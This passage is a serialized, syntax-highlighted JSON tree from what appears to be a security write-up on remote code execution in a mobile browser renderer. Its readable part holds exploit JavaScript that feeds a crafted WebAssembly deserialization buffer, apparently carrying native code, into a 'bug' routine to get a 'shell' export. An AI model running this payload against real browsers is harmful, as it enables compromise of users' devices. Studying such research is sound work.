:216,"props":140784,"children":140785},{"style":6964},[140786],{"type":31,"value":7026},{"type":25,"tag":216,"props":140788,"children":140789},{"style":6989},[140790],{"type":31,"value":184},{"type":25,"tag":216,"props":140792,"children":140793},{"style":6964},[140794],{"type":31,"value":7026},{"type":25,"tag":216,"props":140796,"children":140797},{"style":6989},[140798],{"type":31,"value":331},{"type":25,"tag":216,"props":140800,"children":140801},{"style":6964},[140802],{"type":31,"value":7026},{"type":25,"tag":216,"props":140804,"children":140805},{"style":6989},[140806],{"type":31,"value":1882},{"type":25,"tag":216,"props":140808,"children":140809},{"style":6964},[140810],{"type":31,"value":7026},{"type":25,"tag":216,"props":140812,"children":140813},{"style":6989},[140814],{"type":31,"value":137695},{"type":25,"tag":216,"props":140816,"children":140817},{"style":6964},[140818],{"type":31,"value":7465},{"type":25,"tag":216,"props":140820,"children":140821},{"class":6922,"line":7110},[140822],{"type":25,"tag":216,"props":140823,"children":140824},{"style":6964},[140825],{"type":31,"value":138416},{"type":25,"tag":216,"props":140827,"children":140828},{"class":6922,"line":7216},[140829,140833,140837,140841,140845,140849,140853,140857,140861,140865],{"type":25,"tag":216,"props":140830,"children":140831},{"style":6936},[140832],{"type":31,"value":140512},{"type":25,"tag":216,"props":140834,"children":140835},{"style":6947},[140836],{"type":31,"value":75594},{"type":25,"tag":216,"props":140838,"children":140839},{"style":6953},[140840],{"type":31,"value":6956},{"type":25,"tag":216,"props":140842,"children":140843},{"style":6936},[140844],{"type":31,"value":35895},{"type":25,"tag":216,"props":140846,"children":140847},{"style":6947},[140848],{"type":31,"value":137730},{"type":25,"tag":216,"props":140850,"children":140851},{"style":6964},[140852],{"type":31,"value":179},{"type":25,"tag":216,"props":140854,"children":140855},{"style":7047},[140856],{"type":31,"value":89890},{"type":25,"tag":216,"props":140858,"children":140859},{"style":6964},[140860],{"type":31,"value":1850},{"type":25,"tag":216,"props":140862,"children":140863},{"style":6947},[140864],{"type":31,"value":137747},{"type":25,"tag":216,"props":140866,"children":140867},{"style":6964},[140868],{"type":31,"value":7797},{"type":25,"tag":216,"props":140870,"children":140871},{"class":6922,"line":7244},[140872,140876,140880,140884,140888,140892,140896,140900,140904,140908],{"type":25,"tag":216,"props":140873,"children":140874},{"style":6936},[140875],{"type":31,"value":140512},{"type":25,"tag":216,"props":140877,"children":140878},{"style":6947},[140879],{"type":31,"value":137763},{"type":25,"tag":216,"props":140881,"children":140882},{"style":6953},[140883],{"type":31,"value":6956},{"type":25,"tag":216,"props":140885,"children":140886},{"style":6936},[140887],{"type":31,"value":35895},{"type":25,"tag":216,"props":140889,"children":140890},{"style":6947},[140891],{"type":31,"value":137730},{"type":25,"tag":216,"props":140893,"children":140894},{"style":6964},[140895],{"type":31,"value":179},{"type":25,"tag":216,"props":140897,"children":140898},{"style":7047},[140899],{"type":31,"value":137784},{"type":25,"tag":216,"props":140901,"children":140902},{"style":6964},[140903],{"type":31,"value":1850},{"type":25,"tag":216,"props":140905,"children":140906},{"style":6947},[140907],{"type":31,"value":137793},{"type":25,"tag":216,"props":140909,"children":140910},{"style":6964},[140911],{"type":31,"value":7797},{"type":25,"tag":216,"props":140913,"children":140914},{"class":6922,"line":7257},[140915,140919,140923,140927,140931,140935,140939,140943,140947],{"type":25,"tag":216,"props":140916,"children":140917},{"style":6936},[140918],{"type":31,"value":140512},{"type":25,"tag":216,"props":140920,"children":140921},{"style":6947},[140922],{"type":31,"value":83981},{"type":25,"tag":216,"props":140924,"children":140925},{"style":6953},[140926],{"type":31,"value":6956},{"type":25,"tag":216,"props":140928,"children":140929},{"style":6947},[140930],{"type":31,"value":137763},{"type":25,"tag":216,"props":140932,"children":140933},{"style":6964},[140934],{"type":31,"value":179},{"type":25,"tag":216,"props":140936,"children":140937},{"style":6947},[140938],{"type":31,"value":41849},{"type":25,"tag":216,"props":140940,"children":140941},{"style":6964},[140942],{"type":31,"value":179},{"type":25,"tag":216,"props":140944,"children":140945},{"style":6947},[140946],{"type":31,"value":137833},{"type":25,"tag":216,"props":140948,"children":140949},{"style":6964},[140950],{"type":31,"value":6967},{"type":25,"tag":216,"props":140952,"children":140953},{"class":6922,"line":7275},[140954],{"type":25,"tag":216,"props":140955,"children":140956},{"emptyLinePlaceholder":16},[140957],{"type":31,"value":7642},{"type":25,"tag":216,"props":140959,"children":140960},{"class":6922,"line":7296},[140961],{"type":25,"tag":216,"props":140962,"children":140963},{"style":6927},[140964],{"type":31,"value":140965},"  // %WasmTierUpFunction(func);\n",{"type":25,"tag":216,"props":140967,"children":140968},{"class":6922,"line":7305},[140969,140974,140978,140982,140986,140990,140994,140998,141002,141006,141010,141014,141018,141022],{"type":25,"tag":216,"props":140970,"children":140971},{"style":6973},[140972],{"type":31,"value":140973},"  for",{"type":25,"tag":216,"props":140975,"children":140976},{"style":6964},[140977],{"type":31,"value":7016},{"type":25,"tag":216,"props":140979,"children":140980},{"style":6936},[140981],{"type":31,"value":15743},{"type":25,"tag":216,"props":140983,"children":140984},{"style":6947},[140985],{"type":31,"value":7354},{"type":25,"tag":216,"props":140987,"children":140988},{"style":6953},[140989],{"type":31,"value":6956},{"type":25,"tag":216,"props":140991,"children":140992},{"style":6989},[140993],{"type":31,"value":6992},{"type":25,"tag":216,"props":140995,"children":140996},{"style":6964},[140997],{"type":31,"value":21184},{"type":25,"tag":216,"props":140999,"children":141000},{"style":6947},[141001],{"type":31,"value":2289},{"type":25,"tag":216,"props":141003,"children":141004},{"style":6953},[141005],{"type":31,"value":12672},{"type":25,"tag":216,"props":141007,"children":141008},{"style":6989},[141009],{"type":31,"value":140434},{"type":25,"tag":216,"props":141011,"children":141012},{"style":6964},[141013],{"type":31,"value":21184},{"type":25,"tag":216,"props":141015,"children":141016},{"style":6947},[141017],{"type":31,"value":2289},{"type":25,"tag":216,"props":141019,"children":141020},{"style":6953},[141021],{"type":31,"value":55238},{"type":25,"tag":216,"props":141023,"children":141024},{"style":6964},[141025],{"type":31,"value":18761},{"type":25,"tag":216,"props":141027,"children":141028},{"class":6922,"line":7557},[141029,141034],{"type":25,"tag":216,"props":141030,"children":141031},{"style":7047},[141032],{"type":31,"value":141033},"    func",{"type":25,"tag":216,"props":141035,"children":141036},{"style":6964},[141037],{"type":31,"value":7633},{"type":25,"tag":216,"props":141039,"children":141040},{"class":6922,"line":7574},[141041],{"type":25,"tag":216,"props":141042,"children":141043},{"style":6964},[141044],{"type":31,"value":9823},{"type":25,"tag":216,"props":141046,"children":141047},{"class":6922,"line":7591},[141048],{"type":25,"tag":216,"props":141049,"children":141050},{"emptyLinePlaceholder":16},[141051],{"type":31,"value":7642},{"type":25,"tag":216,"props":141053,"children":141054},{"class":6922,"line":7604},[141055,141059,141063,141067,141071,141075,141079],{"type":25,"tag":216,"props":141056,"children":141057},{"style":6936},[141058],{"type":31,"value":11807},{"type":25,"tag":216,"props":141060,"children":141061},{"style":6947},[141062],{"type":31,"value":139868},{"type":25,"tag":216,"props":141064,"children":141065},{"style":6953},[141066],{"type":31,"value":6956},{"type":25,"tag":216,"props":141068,"children":141069},{"style":7047},[141070],{"type":31,"value":139877},{"type":25,"tag":216,"props":141072,"children":141073},{"style":6964},[141074],{"type":31,"value":1850},{"type":25,"tag":216,"props":141076,"children":141077},{"style":6947},[141078],{"type":31,"value":137793},{"type":25,"tag":216,"props":141080,"children":141081},{"style":6964},[141082],{"type":31,"value":7797},{"type":25,"tag":216,"props":141084,"children":141085},{"class":6922,"line":7613},[141086,141090,141094,141098,141102,141106,141110,141114,141118,141122],{"type":25,"tag":216,"props":141087,"children":141088},{"style":6947},[141089],{"type":31,"value":139913},{"type":25,"tag":216,"props":141091,"children":141092},{"style":6953},[141093],{"type":31,"value":6956},{"type":25,"tag":216,"props":141095,"children":141096},{"style":6964},[141097],{"type":31,"value":7016},{"type":25,"tag":216,"props":141099,"children":141100},{"style":6973},[141101],{"type":31,"value":36878},{"type":25,"tag":216,"props":141103,"children":141104},{"style":6947},[141105],{"type":31,"value":139868},{"type":25,"tag":216,"props":141107,"children":141108},{"style":6964},[141109],{"type":31,"value":179},{"type":25,"tag":216,"props":141111,"children":141112},{"style":7047},[141113],{"type":31,"value":61533},{"type":25,"tag":216,"props":141115,"children":141116},{"style":6964},[141117],{"type":31,"value":139942},{"type":25,"tag":216,"props":141119,"children":141120},{"style":6947},[141121],{"type":31,"value":43115},{"type":25,"tag":216,"props":141123,"children":141124},{"style":6964},[141125],{"type":31,"value":6967},{"type":25,"tag":216,"props":141127,"children":141128},{"class":6922,"line":7636},[141129,141133,141137,141141,141145,141149],{"type":25,"tag":216,"props":141130,"children":141131},{"style":6947},[141132],{"type":31,"value":105902},{"type":25,"tag":216,"props":141134,"children":141135},{"style":6964},[141136],{"type":31,"value":179},{"type":25,"tag":216,"props":141138,"children":141139},{"style":7047},[141140],{"type":31,"value":105911},{"type":25,"tag":216,"props":141142,"children":141143},{"style":6964},[141144],{"type":31,"value":1850},{"type":25,"tag":216,"props":141146,"children":141147},{"style":6947},[141148],{"type":31,"value":13037},{"type":25,"tag":216,"props":141150,"children":141151},{"style":6964},[141152],{"type":31,"value":7797},{"type":25,"tag":216,"props":141154,"children":141155},{"class":6922,"line":7645},[141156],{"type":25,"tag":216,"props":141157,"children":141158},{"emptyLinePlaceholder":16},[141159],{"type":31,"value":7642},{"type":25,"tag":216,"props":141161,"children":141162},{"class":6922,"line":7654},[141163,141167,141172,141176,141180,141184,141188,141192],{"type":25,"tag":216,"props":141164,"children":141165},{"style":6936},[141166],{"type":31,"value":11807},{"type":25,"tag":216,"props":141168,"children":141169},{"style":6947},[141170],{"type":31,"value":141171}," result_bytes",{"type":25,"tag":216,"props":141173,"children":141174},{"style":6953},[141175],{"type":31,"value":6956},{"type":25,"tag":216,"props":141177,"children":141178},{"style":6936},[141179],{"type":31,"value":35895},{"type":25,"tag":216,"props":141181,"children":141182},{"style":7047},[141183],{"type":31,"value":137399},{"type":25,"tag":216,"props":141185,"children":141186},{"style":6964},[141187],{"type":31,"value":1850},{"type":25,"tag":216,"props":141189,"children":141190},{"style":6947},[141191],{"type":31,"value":13037},{"type":25,"tag":216,"props":141193,"children":141194},{"style":6964},[141195],{"type":31,"value":7797},{"type":25,"tag":216,"props":141197,"children":141198},{"class":6922,"line":7722},[141199,141203,141207,141211,141215,141219,141223,141227,141231,141235,141239,141243,141247,141251,141255],{"type":25,"tag":216,"props":141200,"children":141201},{"style":6947},[141202],{"type":31,"value":105902},{"type":25,"tag":216,"props":141204,"children":141205},{"style":6964},[141206],{"type":31,"value":179},{"type":25,"tag":216,"props":141208,"children":141209},{"style":7047},[141210],{"type":31,"value":105911},{"type":25,"tag":216,"props":141212,"children":141213},{"style":6964},[141214],{"type":31,"value":1850},{"type":25,"tag":216,"props":141216,"children":141217},{"style":8205},[141218],{"type":31,"value":137966},{"type":25,"tag":216,"props":141220,"children":141221},{"style":6953},[141222],{"type":31,"value":12858},{"type":25,"tag":216,"props":141224,"children":141225},{"style":6947},[141226],{"type":31,"value":141171},{"type":25,"tag":216,"props":141228,"children":141229},{"style":6964},[141230],{"type":31,"value":179},{"type":25,"tag":216,"props":141232,"children":141233},{"style":7047},[141234],{"type":31,"value":137983},{"type":25,"tag":216,"props":141236,"children":141237},{"style":6964},[141238],{"type":31,"value":1850},{"type":25,"tag":216,"props":141240,"children":141241},{"style":8205},[141242],{"type":31,"value":137992},{"type":25,"tag":216,"props":141244,"children":141245},{"style":6964},[141246],{"type":31,"value":7036},{"type":25,"tag":216,"props":141248,"children":141249},{"style":6953},[141250],{"type":31,"value":3539},{"type":25,"tag":216,"props":141252,"children":141253},{"style":8205},[141254],{"type":31,"value":138005},{"type":25,"tag":216,"props":141256,"children":141257},{"style":6964},[141258],{"type":31,"value":7797},{"type":25,"tag":216,"props":141260,"children":141261},{"class":6922,"line":7730},[141262],{"type":25,"tag":216,"props":141263,"children":141264},{"style":6964},[141265],{"type":31,"value":105943},{"type":25,"tag":38,"props":141267,"children":141268},{},[141269],{"type":31,"value":141270},"We get the serialized bytes:",{"type":25,"tag":38,"props":141272,"children":141273},{},[141274],{"type":25,"tag":6467,"props":141275,"children":141278},{"alt":141276,"src":141277},"image2","/posts/mobile-renderer-rce/image2.png",[],{"type":25,"tag":38,"props":141280,"children":141281},{},[141282,141284,141289],{"type":31,"value":141283},"We can now embed this output into the original bytecode that calls ",{"type":25,"tag":82,"props":141285,"children":141287},{"className":141286},[],[141288],{"type":31,"value":136862},{"type":31,"value":1472},{"type":25,"tag":206,"props":141291,"children":141293},{"code":141292,"language":39578,"meta":7,"className":39576,"style":7},"(async () => {\n  const wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  const buffer = new Uint8Array([\n    146, 6, 222, 192, 174, 122, 171, 151, 31, 0, 0, 0, 39, 61, 60, 31, 0, 16, 3, 0, 0, 0, 0, 0, 64,\n    0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 56, 0, 0, 0, 44, 0, 0, 0, 56, 0, 0, 0, 56, 0,\n    0, 0, 56, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 95, 36, 3, 213, 16, 1, 128, 210, 127, 35, 3,\n    213, 231, 67, 190, 169, 253, 123, 1, 169, 253, 67, 0, 145, 191, 3, 0, 145, 253, 123, 193, 168,\n    255, 35, 3, 213, 192, 3, 95, 214, 31, 32, 3, 213, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 92, 50, 162, 0,\n  ]);\n  let r = bug(wasm_code, buffer.buffer);\n  result = (await r.next()).value;\n  console.log('DeserializeWasmModule result: ' + result);\n  const wasm_instance = new WebAssembly.Instance(result);\n  const f = wasm_instance.exports.shell;\n  console.log(f);\n})();\n",[141294],{"type":25,"tag":82,"props":141295,"children":141296},{"__ignoreMap":7},[141297,141320,141347,141566,141633,141640,141667,141878,142129,142380,142604,142786,143007,143085,143092,143139,143182,143218,143261,143300,143327],{"type":25,"tag":216,"props":141298,"children":141299},{"class":6922,"line":6923},[141300,141304,141308,141312,141316],{"type":25,"tag":216,"props":141301,"children":141302},{"style":6964},[141303],{"type":31,"value":1850},{"type":25,"tag":216,"props":141305,"children":141306},{"style":6936},[141307],{"type":31,"value":40108},{"type":25,"tag":216,"props":141309,"children":141310},{"style":6964},[141311],{"type":31,"value":43660},{"type":25,"tag":216,"props":141313,"children":141314},{"style":6936},[141315],{"type":31,"value":18779},{"type":25,"tag":216,"props":141317,"children":141318},{"style":6964},[141319],{"type":31,"value":7241},{"type":25,"tag":216,"props":141321,"children":141322},{"class":6922,"line":6769},[141323,141327,141331,141335,141339,141343],{"type":25,"tag":216,"props":141324,"children":141325},{"style":6936},[141326],{"type":31,"value":40151},{"type":25,"tag":216,"props":141328,"children":141329},{"style":6947},[141330],{"type":31,"value":137386},{"type":25,"tag":216,"props":141332,"children":141333},{"style":6953},[141334],{"type":31,"value":6956},{"type":25,"tag":216,"props":141336,"children":141337},{"style":6936},[141338],{"type":31,"value":35895},{"type":25,"tag":216,"props":141340,"children":141341},{"style":7047},[141342],{"type":31,"value":137399},{"type":25,"tag":216,"props":141344,"children":141345},{"style":6964},[141346],{"type":31,"value":137404},{"type":25,"tag":216,"props":141348,"children":141349},{"class":6922,"line":6778},[141350,141354,141358,141362,141366,141370,141374,141378,141382,141386,141390,141394,141398,141402,141406,141410,141414,141418,141422,141426,141430,141434,141438,141442,141446,141450,141454,141458,141462,141466,141470,141474,141478,141482,141486,141490,141494,141498,141502,141506,141510,141514,141518,141522,141526,141530,141534,141538,141542,141546,141550,141554,141558,141562],{"type":25,"tag":216,"props":141351,"children":141352},{"style":6989},[141353],{"type":31,"value":138129},{"type":25,"tag":216,"props":141355,"children":141356},{"style":6964},[141357],{"type":31,"value":7026},{"type":25,"tag":216,"props":141359,"children":141360},{"style":6989},[141361],{"type":31,"value":137421},{"type":25,"tag":216,"props":141363,"children":141364},{"style":6964},[141365],{"type":31,"value":7026},{"type":25,"tag":216,"props":141367,"children":141368},{"style":6989},[141369],{"type":31,"value":137430},{"type":25,"tag":216,"props":141371,"children":141372},{"style":6964},[141373],{"type":31,"value":7026},{"type":25,"tag":216,"props":141375,"children":141376},{"style":6989},[141377],{"type":31,"value":137439},{"type":25,"tag":216,"props":141379,"children":141380},{"style":6964},[141381],{"type":31,"value":7026},{"type":25,"tag":216,"props":141383,"children":141384},{"style":6989},[141385],{"type":31,"value":184},{"type":25,"tag":216,"props":141387,"children":141388},{"style":6964},[141389],{"type":31,"value":7026},{"type":25,"tag":216,"props":141391,"children":141392},{"style":6989},[141393],{"type":31,"value":1882},{"type":25,"tag":216,"props":141395,"children":141396},{"style":6964},[141397],{"type":31,"value":7026},{"type":25,"tag":216,"props":141399,"children":141400},{"style":6989},[141401],{"type":31,"value":1882},{"type":25,"tag":216,"props":141403,"children":141404},{"style":6964},[141405],{"type":31,"value":7026},{"type":25,"tag":216,"props":141407,"children":141408},{"style":6989},[141409],{"type":31,"value":1882},{"type":25,"tag":216,"props":141411,"children":141412},{"style":6964},[141413],{"type":31,"value":7026},{"type":25,"tag":216,"props":141415,"children":141416},{"style":6989},[141417],{"type":31,"value":184},{"type":25,"tag":216,"props":141419,"children":141420},{"style":6964},[141421],{"type":31,"value":7026},{"type":25,"tag":216,"props":141423,"children":141424},{"style":6989},[141425],{"type":31,"value":21486},{"type":25,"tag":216,"props":141427,"children":141428},{"style":6964},[141429],{"type":31,"value":7026},{"type":25,"tag":216,"props":141431,"children":141432},{"style":6989},[141433],{"type":31,"value":184},{"type":25,"tag":216,"props":141435,"children":141436},{"style":6964},[141437],{"type":31,"value":7026},{"type":25,"tag":216,"props":141439,"children":141440},{"style":6989},[141441],{"type":31,"value":137504},{"type":25,"tag":216,"props":141443,"children":141444},{"style":6964},[141445],{"type":31,"value":7026},{"type":25,"tag":216,"props":141447,"children":141448},{"style":6989},[141449],{"type":31,"value":1882},{"type":25,"tag":216,"props":141451,"children":141452},{"style":6964},[141453],{"type":31,"value":7026},{"type":25,"tag":216,"props":141455,"children":141456},{"style":6989},[141457],{"type":31,"value":1882},{"type":25,"tag":216,"props":141459,"children":141460},{"style":6964},[141461],{"type":31,"value":7026},{"type":25,"tag":216,"props":141463,"children":141464},{"style":6989},[141465],{"type":31,"value":21253},{"type":25,"tag":216,"props":141467,"children":141468},{"style":6964},[141469],{"type":31,"value":7026},{"type":25,"tag":216,"props":141471,"children":141472},{"style":6989},[141473],{"type":31,"value":331},{"type":25,"tag":216,"props":141475,"children":141476},{"style":6964},[141477],{"type":31,"value":7026},{"type":25,"tag":216,"props":141479,"children":141480},{"style":6989},[141481],{"type":31,"value":184},{"type":25,"tag":216,"props":141483,"children":141484},{"style":6964},[141485],{"type":31,"value":7026},{"type":25,"tag":216,"props":141487,"children":141488},{"style":6989},[141489],{"type":31,"value":1882},{"type":25,"tag":216,"props":141491,"children":141492},{"style":6964},[141493],{"type":31,"value":7026},{"type":25,"tag":216,"props":141495,"children":141496},{"style":6989},[141497],{"type":31,"value":58639},{"type":25,"tag":216,"props":141499,"children":141500},{"style":6964},[141501],{"type":31,"value":7026},{"type":25,"tag":216,"props":141503,"children":141504},{"style":6989},[141505],{"type":31,"value":59854},{"type":25,"tag":216,"props":141507,"children":141508},{"style":6964},[141509],{"type":31,"value":7026},{"type":25,"tag":216,"props":141511,"children":141512},{"style":6989},[141513],{"type":31,"value":184},{"type":25,"tag":216,"props":141515,"children":141516},{"style":6964},[141517],{"type":31,"value":7026},{"type":25,"tag":216,"props":141519,"children":141520},{"style":6989},[141521],{"type":31,"value":22067},{"type":25,"tag":216,"props":141523,"children":141524},{"style":6964},[141525],{"type":31,"value":7026},{"type":25,"tag":216,"props":141527,"children":141528},{"style":6989},[141529],{"type":31,"value":137430},{"type":25,"tag":216,"props":141531,"children":141532},{"style":6964},[141533],{"type":31,"value":7026},{"type":25,"tag":216,"props":141535,"children":141536},{"style":6989},[141537],{"type":31,"value":137601},{"type":25,"tag":216,"props":141539,"children":141540},{"style":6964},[141541],{"type":31,"value":7026},{"type":25,"tag":216,"props":141543,"children":141544},{"style":6989},[141545],{"type":31,"value":137610},{"type":25,"tag":216,"props":141547,"children":141548},{"style":6964},[141549],{"type":31,"value":7026},{"type":25,"tag":216,"props":141551,"children":141552},{"style":6989},[141553],{"type":31,"value":137619},{"type":25,"tag":216,"props":141555,"children":141556},{"style":6964},[141557],{"type":31,"value":7026},{"type":25,"tag":216,"props":141559,"children":141560},{"style":6989},[141561],{"type":31,"value":137619},{"type":25,"tag":216,"props":141563,"children":141564},{"style":6964},[141565],{"type":31,"value":7465},{"type":25,"tag":216,"props":141567,"children":141568},{"class":6922,"line":7005},[141569,141573,141577,141581,141585,141589,141593,141597,141601,141605,141609,141613,141617,141621,141625,141629],{"type":25,"tag":216,"props":141570,"children":141571},{"style":6989},[141572],{"type":31,"value":138129},{"type":25,"tag":216,"props":141574,"children":141575},{"style":6964},[141576],{"type":31,"value":7026},{"type":25,"tag":216,"props":141578,"children":141579},{"style":6989},[141580],{"type":31,"value":1882},{"type":25,"tag":216,"props":141582,"children":141583},{"style":6964},[141584],{"type":31,"value":7026},{"type":25,"tag":216,"props":141586,"children":141587},{"style":6989},[141588],{"type":31,"value":93224},{"type":25,"tag":216,"props":141590,"children":141591},{"style":6964},[141592],{"type":31,"value":7026},{"type":25,"tag":216,"props":141594,"children":141595},{"style":6989},[141596],{"type":31,"value":21486},{"type":25,"tag":216,"props":141598,"children":141599},{"style":6964},[141600],{"type":31,"value":7026},{"type":25,"tag":216,"props":141602,"children":141603},{"style":6989},[141604],{"type":31,"value":184},{"type":25,"tag":216,"props":141606,"children":141607},{"style":6964},[141608],{"type":31,"value":7026},{"type":25,"tag":216,"props":141610,"children":141611},{"style":6989},[141612],{"type":31,"value":331},{"type":25,"tag":216,"props":141614,"children":141615},{"style":6964},[141616],{"type":31,"value":7026},{"type":25,"tag":216,"props":141618,"children":141619},{"style":6989},[141620],{"type":31,"value":1882},{"type":25,"tag":216,"props":141622,"children":141623},{"style":6964},[141624],{"type":31,"value":7026},{"type":25,"tag":216,"props":141626,"children":141627},{"style":6989},[141628],{"type":31,"value":137695},{"type":25,"tag":216,"props":141630,"children":141631},{"style":6964},[141632],{"type":31,"value":7465},{"type":25,"tag":216,"props":141634,"children":141635},{"class":6922,"line":7110},[141636],{"type":25,"tag":216,"props":141637,"children":141638},{"style":6964},[141639],{"type":31,"value":138416},{"type":25,"tag":216,"props":141641,"children":141642},{"class":6922,"line":7216},[141643,141647,141651,141655,141659,141663],{"type":25,"tag":216,"props":141644,"children":141645},{"style":6936},[141646],{"type":31,"value":40151},{"type":25,"tag":216,"props":141648,"children":141649},{"style":6947},[141650],{"type":31,"value":129199},{"type":25,"tag":216,"props":141652,"children":141653},{"style":6953},[141654],{"type":31,"value":6956},{"type":25,"tag":216,"props":141656,"children":141657},{"style":6936},[141658],{"type":31,"value":35895},{"type":25,"tag":216,"props":141660,"children":141661},{"style":7047},[141662],{"type":31,"value":137399},{"type":25,"tag":216,"props":141664,"children":141665},{"style":6964},[141666],{"type":31,"value":137404},{"type":25,"tag":216,"props":141668,"children":141669},{"class":6922,"line":7244},[141670,141675,141679,141683,141687,141691,141695,141699,141703,141708,141712,141717,141721,141726,141730,141735,141739,141743,141747,141751,141755,141759,141763,141767,141771,141776,141780,141785,141789,141794,141798,141802,141806,141810,141814,141818,141822,141826,141830,141834,141838,141842,141846,141850,141854,141858,141862,141866,141870,141874],{"type":25,"tag":216,"props":141671,"children":141672},{"style":6989},[141673],{"type":31,"value":141674},"    146",{"type":25,"tag":216,"props":141676,"children":141677},{"style":6964},[141678],{"type":31,"value":7026},{"type":25,"tag":216,"props":141680,"children":141681},{"style":6989},[141682],{"type":31,"value":22379},{"type":25,"tag":216,"props":141684,"children":141685},{"style":6964},[141686],{"type":31,"value":7026},{"type":25,"tag":216,"props":141688,"children":141689},{"style":6989},[141690],{"type":31,"value":138468},{"type":25,"tag":216,"props":141692,"children":141693},{"style":6964},[141694],{"type":31,"value":7026},{"type":25,"tag":216,"props":141696,"children":141697},{"style":6989},[141698],{"type":31,"value":138477},{"type":25,"tag":216,"props":141700,"children":141701},{"style":6964},[141702],{"type":31,"value":7026},{"type":25,"tag":216,"props":141704,"children":141705},{"style":6989},[141706],{"type":31,"value":141707},"174",{"type":25,"tag":216,"props":141709,"children":141710},{"style":6964},[141711],{"type":31,"value":7026},{"type":25,"tag":216,"props":141713,"children":141714},{"style":6989},[141715],{"type":31,"value":141716},"122",{"type":25,"tag":216,"props":141718,"children":141719},{"style":6964},[141720],{"type":31,"value":7026},{"type":25,"tag":216,"props":141722,"children":141723},{"style":6989},[141724],{"type":31,"value":141725},"171",{"type":25,"tag":216,"props":141727,"children":141728},{"style":6964},[141729],{"type":31,"value":7026},{"type":25,"tag":216,"props":141731,"children":141732},{"style":6989},[141733],{"type":31,"value":141734},"151",{"type":25,"tag":216,"props":141736,"children":141737},{"style":6964},[141738],{"type":31,"value":7026},{"type":25,"tag":216,"props":141740,"children":141741},{"style":6989},[141742],{"type":31,"value":100625},{"type":25,"tag":216,"props":141744,"children":141745},{"style":6964},[141746],{"type":31,"value":7026},{"type":25,"tag":216,"props":141748,"children":141749},{"style":6989},[141750],{"type":31,"value":1882},{"type":25,"tag":216,"props":141752,"children":141753},{"style":6964},[141754],{"type":31,"value":7026},{"type":25,"tag":216,"props":141756,"children":141757},{"style":6989},[141758],{"type":31,"value":1882},{"type":25,"tag":216,"props":141760,"children":141761},{"style":6964},[141762],{"type":31,"value":7026},{"type":25,"tag":216,"props":141764,"children":141765},{"style":6989},[141766],{"type":31,"value":1882},{"type":25,"tag":216,"props":141768,"children":141769},{"style":6964},[141770],{"type":31,"value":7026},{"type":25,"tag":216,"props":141772,"children":141773},{"style":6989},[141774],{"type":31,"value":141775},"39",{"type":25,"tag":216,"props":141777,"children":141778},{"style":6964},[141779],{"type":31,"value":7026},{"type":25,"tag":216,"props":141781,"children":141782},{"style":6989},[141783],{"type":31,"value":141784},"61",{"type":25,"tag":216,"props":141786,"children":141787},{"style":6964},[141788],{"type":31,"value":7026},{"type":25,"tag":216,"props":141790,"children":141791},{"style":6989},[141792],{"type":31,"value":141793},"60",{"type":25,"tag":216,"props":141795,"children":141796},{"style":6964},[141797],{"type":31,"value":7026},{"type":25,"tag":216,"props":141799,"children":141800},{"style":6989},[141801],{"type":31,"value":100625},{"type":25,"tag":216,"props":141803,"children":141804},{"style":6964},[141805],{"type":31,"value":7026},{"type":25,"tag":216,"props":141807,"children":141808},{"style":6989},[141809],{"type":31,"value":1882},{"type":25,"tag":216,"props":141811,"children":141812},{"style":6964},[141813],{"type":31,"value":7026},{"type":25,"tag":216,"props":141815,"children":141816},{"style":6989},[141817],{"type":31,"value":44811},{"type":25,"tag":216,"props":141819,"children":141820},{"style":6964},[141821],{"type":31,"value":7026},{"type":25,"tag":216,"props":141823,"children":141824},{"style":6989},[141825],{"type":31,"value":21253},{"type":25,"tag":216,"props":141827,"children":141828},{"style":6964},[141829],{"type":31,"value":7026},{"type":25,"tag":216,"props":141831,"children":141832},{"style":6989},[141833],{"type":31,"value":1882},{"type":25,"tag":216,"props":141835,"children":141836},{"style":6964},[141837],{"type":31,"value":7026},{"type":25,"tag":216,"props":141839,"children":141840},{"style":6989},[141841],{"type":31,"value":1882},{"type":25,"tag":216,"props":141843,"children":141844},{"style":6964},[141845],{"type":31,"value":7026},{"type":25,"tag":216,"props":141847,"children":141848},{"style":6989},[141849],{"type":31,"value":1882},{"type":25,"tag":216,"props":141851,"children":141852},{"style":6964},[141853],{"type":31,"value":7026},{"type":25,"tag":216,"props":141855,"children":141856},{"style":6989},[141857],{"type":31,"value":1882},{"type":25,"tag":216,"props":141859,"children":141860},{"style":6964},[141861],{"type":31,"value":7026},{"type":25,"tag":216,"props":141863,"children":141864},{"style":6989},[141865],{"type":31,"value":1882},{"type":25,"tag":216,"props":141867,"children":141868},{"style":6964},[141869],{"type":31,"value":7026},{"type":25,"tag":216,"props":141871,"children":141872},{"style":6989},[141873],{"type":31,"value":33383},{"type":25,"tag":216,"props":141875,"children":141876},{"style":6964},[141877],{"type":31,"value":7465},{"type":25,"tag":216,"props":141879,"children":141880},{"class":6922,"line":7257},[141881,141885,141889,141893,141897,141901,141905,141909,141913,141917,141921,141925,141929,141933,141937,141941,141945,141949,141953,141957,141961,141965,141969,141973,141977,141981,141985,141989,141993,141997,142001,142005,142009,142013,142017,142021,142025,142029,142033,142037,142041,142045,142049,142053,142057,142061,142065,142069,142073,142077,142081,142085,142089,142093,142097,142101,142105,142109,142113,142117,142121,142125],{"type":25,"tag":216,"props":141882,"children":141883},{"style":6989},[141884],{"type":31,"value":138129},{"type":25,"tag":216,"props":141886,"children":141887},{"style":6964},[141888],{"type":31,"value":7026},{"type":25,"tag":216,"props":141890,"children":141891},{"style":6989},[141892],{"type":31,"value":1882},{"type":25,"tag":216,"props":141894,"children":141895},{"style":6964},[141896],{"type":31,"value":7026},{"type":25,"tag":216,"props":141898,"children":141899},{"style":6989},[141900],{"type":31,"value":1882},{"type":25,"tag":216,"props":141902,"children":141903},{"style":6964},[141904],{"type":31,"value":7026},{"type":25,"tag":216,"props":141906,"children":141907},{"style":6989},[141908],{"type":31,"value":1882},{"type":25,"